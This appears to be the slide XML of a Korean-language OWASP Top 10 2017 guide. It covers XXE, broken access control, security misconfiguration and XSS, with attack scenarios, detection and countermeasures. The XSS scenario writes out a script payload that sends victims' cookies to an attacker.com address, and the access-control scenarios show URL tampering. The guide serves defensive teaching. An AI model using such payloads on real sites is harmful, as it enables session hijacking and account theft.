            <a:endParaRPr lang="en-US" sz="9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Testing Guide: Testing for XML Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1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OWASP XXE Vulnerability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OWASP Cheat Sheet: XXE Prevention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OWASP Cheat Sheet: XML Security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외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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  <a:hlinkClick r:id="rId11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CWE-611: Improper Restriction of XXE</a:t>
            </a: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Billion Laughs Attack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SAML Security XML External Entity Attack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Detecting and exploiting XXE in SAML Interfaces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개발자에 대한 교육이 완벽하게 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XEE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확인하고 완화시키는데 필수적입니다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그외에 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XXE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막기 위해서 다음이 필요합니다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  <a:endParaRPr lang="en-US" sz="870" dirty="0"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Tx/>
              <a:buChar char="•"/>
            </a:pP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가능할 때마다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JSON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과 같은 덜 복잡한 데이터 형식을 사용하거나 민감한 데이터를 지양합니다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AU" sz="870" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000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Tx/>
              <a:buChar char="•"/>
            </a:pP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애플리케이션이나 운영체제에서 사용중인 모든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프로세서와 라이브러리를 패치하거나 업그레이드합니다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의존성 체커를 사용합니다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 SOAP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을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SOAP 1.2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나 그 이상으로 업그레이드합니다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rgbClr val="FFFFFF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Char char="•"/>
            </a:pP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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention’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에 따라 애플리케이션에 있는 모든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파서의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외부 개체와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DTD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처리를 비활성화합니다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rgbClr val="000000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Char char="•"/>
            </a:pP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서버에서 허용 목록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화이트리스트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을 이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="870" dirty="0" err="1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입력값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 검증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필터링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검사를 구현해서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문서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헤더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노드에 있는 악의적인 데이터를 막습니다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Char char="•"/>
            </a:pP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이나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XSL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파일 업로드 기능이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XSD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="870" dirty="0" err="1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검증기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 같은 것을 사용해서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XML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이 유효한 내용인지 확인하고 검증합니다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rgbClr val="FFFFFF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Char char="•"/>
            </a:pP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많은 것들이 통합된 크고 복잡한 애플리케이션에서는 수동으로 소스코드 리뷰가 최선의 방법일 수 있으나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en-US" altLang="ko-KR" sz="87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6"/>
              </a:rPr>
              <a:t>SAST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는 소스코드에 존재하는 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XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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탐지하는데 도움이 될 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="87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870" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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위 방법들이 가능하지 않다면 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XXE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공격을 확인하고 감시하고 막기 위해 가상 패치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API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보안 게이트웨이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웹 애플리케이션 방화벽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(WAF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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사용을 고려하기 바랍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="870" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="9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A4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</a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>외부 개체</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(XXE)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62710"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="211658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099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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="OpenSymbol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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF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432"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XML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업로드가 가능하며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XML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문서에 취약한 코드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의존성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통합을 공격하는 악의적인 내용을 포함할 수 있다면 공격자는 취약한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XML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프로세스를 공격할 수 있습니다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기본적으로 대부분의 오래된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XML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프로세서들은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XML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처리 중에 참조되고 평가되는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URI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에 대해 외부 개체의 지정을 허용합니다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..</a:t>
                      </a:r>
                    </a:p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/>
                        </a:rPr>
                        <a:t>SAST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는 의존성 및 설정을 조사함으로써 이 문제를 발견할 수 있습니다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7"/>
                        </a:rPr>
                        <a:t>DAST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는 이 문제를 확인하고 공격 가능한지 알기 위해 추가적인 수작업이 필요합니다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수동 테스터는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XXE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테스트 방법을 교육 받아야 합니다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 XXE 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테스트는 일반적인 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2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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년 테스트와는 다르기 때문입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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이 취약점은 데이터 가져오기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서버에서 원격 요청 실행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내부 시스템 탐지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서비스 거부 공격 수행 및 다른 공격들의 실행을 위해 사용할 수 있습니다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업무에 대한 영향은 영향 받는 애플리케이션과 데이터의 보호 요구 사항에 따라 다릅니다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1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2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3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5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6" name="Shape 303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{220181FD-BC7B-4DFC-8619-4CA6BFDAB363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공격 시나리오 예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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74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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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 값을 검증절차 없이 사용자 계정정보에 접근하는 용도의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문에서 사용하는 애플리케이션이 있고 아래와 같은 형태의 소스코드로 구현되어 있다고 가정해 봅시다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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4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en-US" sz="74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pstmt.setString</a:t>
            </a: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(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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("acct"));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="740" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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en-US" sz="74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ResultSet</a:t>
            </a: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results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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pstmt.executeQuery</a:t>
            </a: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 );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공격자는 브라우저에서 서버로 전송되는 시점에 아래와 같은 형태로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acct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파라미터를 원하는 값으로 수정할 수 있고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만약 입력 값을 적절히 검증하지 않는다면 다른 사용자의 계정에 접근하게 될 수도 있습니다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4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74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  </a:t>
            </a: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http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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notmyacct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74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시나리오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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공격자가 브라우저를 통해 원하는 대상의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직접 입력할 경우 접근 대상이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페이지라면 관리자 외의 인원은 접근할 수 없어야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="740" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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74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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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admin_getappInfo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위와 같은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직접 입력을 통해 인가되지 않은 사용자가 요청한 페이지에 접근할 수 있거나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관리자 외의 인원이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ko-KR" altLang="en-US" sz="7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페이지에 접근할 수 있다면 취약합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="74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740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취약점 확인 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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접근통제는 사용자들이 의도한 권한을 벗어난 행동을 할 수 없도록 정책을 시행합니다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접근통제에 실패할 경우 일반적으로 인가되지 않은 정보 노출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조작이나 파괴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사용자에게 허용된 범위를 벗어난 사업적 기능 수행 등을 초래하게 됩니다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흔하게 발생하는 접근통제 취약점들은 아래 사항들을 포함합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr 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URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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내부 애플리케이션 상태나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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페이지 조작</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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맞춤형 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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공격 툴을 통해 접근통제 절차를 우회할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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기본 키가 다른 사용자의 레코드로 변경되도록 허용하고 다른 계정의 정보를 열람하거나 편집할 수 있도록 허용되어 있다면 접근통제에 실패한 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr 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 하지 않고 활동하는 사용자나 일반 사용자로 로그인하여 관리자 처럼 활동하는 사용자가 있다면 권한상승이 가능한 상태입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr 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토큰 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(JWT)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 통제 토큰 재전송이나 변경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권한 상승 목적으로 쿠키나 감춰진 필드 조작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JWT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토큰 무효화 악용 등과 같은 메타 데이터 조작 행위가 허용된다면 접근 통제에 실패한 것입니다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설정이 잘못되어 있을 경우 인가되지 않은 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접근을 허용할 수도 있습니다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인증 절차를 거치지 않은 사용자가 인증이 필요한 페이지를 둘러보게 하거나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권한이 필요한 페이지에 일반 사용자가 접근해 보도록 하거나 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POST, PUT, DELETE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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메소드에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접근통제를 적용하지 않은 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사용해 보게끔 함으로써 접근통제 실패 여부를 확인할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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800" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000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참조문서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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ko-KR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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  <a:hlinkClick r:id="rId4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OWASP Proactive Controls: Access Controls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OWASP Application Security Verification Standard: V4 Access Control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Testing Guide: Authorization Testing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Cheat Sheet: Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4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CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')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CWE-284: Improper Access Control (Authorization)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CWE-285: Improper Authorization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CWE-639: Authorization Bypass Through User-Controlled Key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PortSwigger</a:t>
            </a:r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: Exploiting CORS Misconfiguration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보안 대책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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 통제는 공격자가 접근 제어 검사 또는 메타 데이터를 수정할 수 없는 신뢰할 수 있는 서버 측 코드 또는 서버가 없는 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적용될 경우에만 효과적입니다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불특정 다수에게 공개된 자원을 제외하곤 디폴트 정책은 차단으로 운영해야 합니다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CORS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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사용 최소화를 포함한 접근통제 절차를 구현하고 애플리케이션 전체에 적용해야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr 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접근통제 모델은 사용자에게 특정 레코드를 생성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열람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삭제 할 수 있는 권한을 허용하기 보다는 레코드 소유자만 권한을 갖게 끔 강제해야 합니다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유일한 애플리케이션 비즈니스의 제한 요구 사항들은 도메인 모델에 의해 적용되어야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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서버상의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="78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디렉토리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78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리스팅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기능을 비활성화 하고 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78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같은 메타데이터와 백업파일들이 웹 루트에 존재하지 않게끔 운영해야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 통제에 실패한 경우에는 기록되어야 하고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반복적인 실패가 발생하는 것과 같이 적절한 시점에 관리자에게 경고 메시지가 전송되어야 합니다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자동화 공격 툴로 인한 피해를 최소화 하기 위해 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컨트롤러에 대한 접근 임계치를 제한해야 합니다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JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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토큰은 로그아웃 이후 무효화 되어야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 및 품질보증 담당자는 기능적인 접근통제 부분과 통합 테스트를 포함시켜야만 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="7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80" b="1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A5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취약한 접근 통제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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15044"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="214529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Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs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접근통제 절차를 무력화 시키는 것은 공격자들에게 요구되는 핵심 기술입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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SAST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와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5"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike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툴은 접근통제 절차의 존재 여부를 탐지할 수는 있으나 작동 여부에 대해서는 검증할 수 없습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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접근통제 절차에 취약점이 존재하는지는 수동 작업으로 탐지가 가능하며</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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특정 프레임워크 상의 접근통제 절차</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="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누락은</a:t>
                      </a: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자동화 툴을 사용해서도 탐지 가능합니다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자동화된 탐지 기법과 개발자에 의한 실질적인 기능 점검에는 한계가 있기 때문에 접근통제 절차가 취약하게 구성되는 경우는 흔하게 발생합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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일반적으로 접근통제 절차 상의 취약점을 파악하는 건 자동화된 정적 또는 동적 점검 방식으로는 처리할 수 없는 부분입니다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GET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PUT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과 같은 악용 가능성 있는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HTTP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메소드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컨트롤러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직접 객체 참조 등을 대상으로 누락되거나 비효율적인 접근통제 절차를 탐지하는 데는 수동 점검이 가장 좋은 방법입니다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기술적 관점에서 보면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접근통제 절차가 취약할 경우 공격자가 일반적인 사용자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관리자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권한 부여가 가능한 사용자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모든 데이터에 생성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접근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수정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삭제 권한을 가진 사용자를 가장하여 행동할 수 있게 됩니다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사업적 관점의 영향도는 애플리케이션과 데이터의 보호 필요성에 따라 달라질 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="8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0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1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2" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28946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4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6DEC1459-B1E8-4F98-88CB-36AB317BE4DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23721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78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공격 시나리오 예제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시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr 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#1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알려진 취약점을 포함하고 있는 샘플 애플리케이션이 삭제되지 않은 채로 애플리케이션 서버가 운영 환경에서 사용 중이라면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샘플 애플리케이션은 공격자가 서버를 공격하는데 악용될 수 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샘플 애플리케이션 중에 관리 콘솔이 포함되어 있고 디폴트 계정 정보가 변경되지 않았다면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공격자는 디폴트 패스워드를 사용해 접속에 성공함으로써 권한을 획득할 수도 있습니다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시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr 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#2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서버 내 디렉토리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리스팅이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비활성화되지 않았다면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공격자는 디렉토리 목록이 노출됨을 발견하게 되고 자바 클래스 파일을 다운로드하여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디컴파일과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리버스엔지니어링을 통해 애플리케이션 상에 존재하는 심각한 접근 통제 취약점을 찾아낼 수도 있습니다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#3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사용자에게 전달하는 응답 메시지 상에 스택 추적 정보와 같은 상세한 에러 메시지를 노출하도록 애플리케이션 서버가 설정되어 있다면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구성 요소 버전 정보와 같은 공격에 도움을 줄 수 있는 민감한 정보나 내부적인 결함들이 잠재적으로 노출될 수 있습니다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#4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클라우드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서비스 제공자가 다른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클라우드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서비스 이용자들이 인터넷을 통해 접근 가능한 상태로 디폴트 공유 권한을 열어둔 상태라면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클라우드 스토리지에 저장되어 있는 민감한 데이터에 대한 접근을 허용할 수도 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr 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취약점 확인 방법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애플리케이션이 아래 사항들에 해당할 경우 취약한 상태일 수도 있습니다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 스택 전 영역에 적절한 보안 강화 절차가 누락된 상태이거나 클라우드 서비스 상에 권한이 부적절하게 설정되어 있습니다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불필요한 기능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포트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서비스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계정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특수권한 등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활성화 되거나 설치되어 있습니다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디폴트 계정과 비밀번호가 활성화 되어 있거나 해당 정보들을 변경 없이 사용하고 있는 중입니다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에러 처리 과정에서 스택 추적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정보나 공격에 도움이 될만한 다른 정보들을 노출하고 있습니다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업그레이드된 시스템 상에 최신 보안 기능들이 비활성화 되어 있거나 안전하게 설정되어 있지 않습니다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 서버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프레임워크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:Struts, Spring, ASP.NET),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라이브러리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데이터베이스 상에 보안 설정이 되어 있지 않다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서버가 보안 헤더</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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보안 강화 수단을 보내지 않거나 안전한 값을 설정하지 않고 있습니다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구 버전이나 취약한 버전의 소프트웨어를 사용하고 있습니다 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A9:2017-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알려진 취약점이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있는 구성요소 사용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참고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).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ko-KR" altLang="en-US" sz="8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협력적이고 반복적인 애플리케이션 보안 설정 절차가 없다면 시스템은 높은 위험에 처해 있다고 봐야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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참조문서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ko-KR" sz="200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mj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ko-KR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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  <a:hlinkClick r:id="rId5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OWASP Testing Guide: Configuration Management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Testing Guide: Testing for Error Codes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Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin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보안설정 오류와 관련한 추가 요구사항들은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애플리케이션 보안 검증 표준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V19 Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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에서 확인 가능하다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900" b="1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외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800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NIST Guide to General Server Hardening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CWE-2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" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: </a:t>
            </a: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Environmental Security Flaws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CWE-16: Configuration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CWE-388: Error Handling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CIS Security Configuration Guides/Benchmarks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Amazon S3 Bucket Discovery and Enumeration</a:t>
            </a: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아래 사항들을 포함한 안전한 설치 과정이 시행되어야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위험을 적절하게 차단할 수 있도록 빠르고 쉽게 다른 환경으로 전환할 수 있는 반복적인 보안 강화 절차를 적용해야 합니다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개발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품질 관리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운영 환경은 환경 별로 상이한 자격 증명 정보를 사용하고 동등한 보안 수준으로 설정되어야 하며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새로운 보안 환경을 구축하는데 소모되는 리소스를 최소화 하기 위해 절차를 자동화 해야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불필요한 기능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구성 요소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문서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샘플 애플리케이션 없이 최소한으로 플랫폼을 유지하고 사용하지 않는 기능과 프레임워크는 삭제하거나 설치하지 말아야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패치 관리 절차의 일부분으로 모든 보안 정보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업데이트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패치를 대상으로 설정을 적절히 검토하고 갱신하는 절차가 필요하며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특히 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S3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="86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버킷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권한과 같은 클라우드 스토리지 권한을 검토하는 절차가 중요합니다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en-US" sz="86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A9:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="86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알려진 취약점이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="86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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="86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 action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>있는 구성요소 사용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="86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참고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).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세분화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컨테이너화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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클라우드 보안 그룹과 같은 방법으로 구성 요소나 입주자들 간에 효율적이고 안전한 격리를 제공하는 세분화된 애플리케이션 아키텍처를 적용해야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8"/>
              </a:rPr>
              <a:t>보안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="86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8"/>
              </a:rPr>
              <a:t>해더</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="86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와</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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같은 보안 강화 수단을 사용자에게 전송해야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6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모든 영역의 보안 설정이 적절히 반영되어 있는지 검증할 수 있는 자동화된 절차를 수립해야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="86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A6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보안 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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7958"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="21024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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg2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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs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공격자는 인가되지 않은 영역으로 접근할 수 있는 권한이나 시스템 정보를 얻기 위해 패치 되지 않은 취약점을 공격하거나 디폴트 계정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미사용 페이지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보호받지 못하는 파일이나 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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디렉토리에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접근을 시도합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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잘못된 보안 구성은 네트워크 서비스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플랫폼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웹 서버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애플리케이션 서버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데이터베이스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프레임워크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사용자 정의 코드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사전 설치된 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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가상머신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컨테이너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스토리지 등 애플리케이션 스택의 모든 영역에서 발생할 수 있으며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,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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자동화된 취약점 스캐너는 설정 오류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디폴트 계정 정보 및 설정 유지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활성화된 불필요한 서비스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변경이 필요한 과거 옵션 값과 같은 보안 관점에서 미흡한 설정 상태들을 찾아 내는데 유용하게 사용됩니다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사업적 관점의 영향도는 애플리케이션과 데이터의 보호 필요성에 따라 달라지게 되나 보안 설정이 미흡하게 유지될 경우 공격자는 일부 인가되지 않은 시스템이나 기능에 접근할 수 있는 기회를 얻게 될 수도 있으며 이를 통해 시스템 상의 권한을 완전히 장악하게 되는 경우도 발생 가능합니다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1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2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보안취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13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9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FB32782C-4859-496F-8A32-26B4D253701D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2950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85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공격 시나리오 예제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#1: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애플리케이션은 유효성 검사 또는 필터링 처리없이 다음의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HTML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조각의 구성 내 신뢰할 수 없는 데이터를 사용합니다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  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1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creditcard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' type='TEXT'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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  value=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" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1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request.getParameter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("CC") + "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&gt;";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공격자는 브라우저 내에서 다음과 같이 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‘CC’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파라미터를 조작합니다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 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&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1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document.location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=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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  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http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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  foo=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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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'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공격으로 인해 피해자의 세션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ID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가 공격자의 웹 사이트로 전송되어 공격자가 사용자의 현재 세션을 가로챌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주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공격자는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를 사용하여 애플리케이션이 사용할 수 있는 자동화된 크로스 사이트 요청 변조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(CSRF)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방어를 무력화할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취약점 확인 방법 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일반적으로 사용자의 브라우저를 목표로 하는 세 가지 형태의 크로스 사이트 스크립팅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(XSS)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 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리플렉티드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XSS: HTML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출력의 일부로써 유효성이 확인되지 않고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특수문자가 필터되지 않은 사용자 입력이 애플리케이션 혹은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 포함됩니다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공격이 성공하면 공격자는 피해자의 브라우저에서 임의의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HTML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과 자바스크립트를 실행할 수 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전형적으로 사용자는 악의적인 워터링 홀 공격을 수행하는 웹 사이트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광고 사이트 혹은 이와 유사한 공격자에 의해 제어되는 페이지를 가리키는 몇몇 악의적인 링크와 상호 작성을 해야 할 필요가 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저장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XSS: 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응용 프로그램 또는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에서 나중에 다른 사용자 또는 관리자가 볼 수 있는 정제되지 않은 사용자 입력값이 저장됩니다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저장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는 종종 높은 혹은 중대한 위험으로 간주됩니다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DOM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기반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XSS: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페이지에 공격자가 제어 가능한 데이터를 동적으로 포함할 수 있는 자바스크립트 프레임워크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한 페이지 애플리케이션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그리고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는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DOM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기반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 취약합니다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이론상으로 애플리케이션은 안전하지 않은 자바스크립트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로 공격자가 제어 가능한 데이터를 보내지 않습니다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전형적인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공격은 세션 도용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계정 탈취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다중 요소 인증 우회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트로이 목마 악성코드 배포 로그인 패널과 같은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DOM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노드 대체 혹은 변조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악성코드 다운로드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키 로깅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그리고 다른 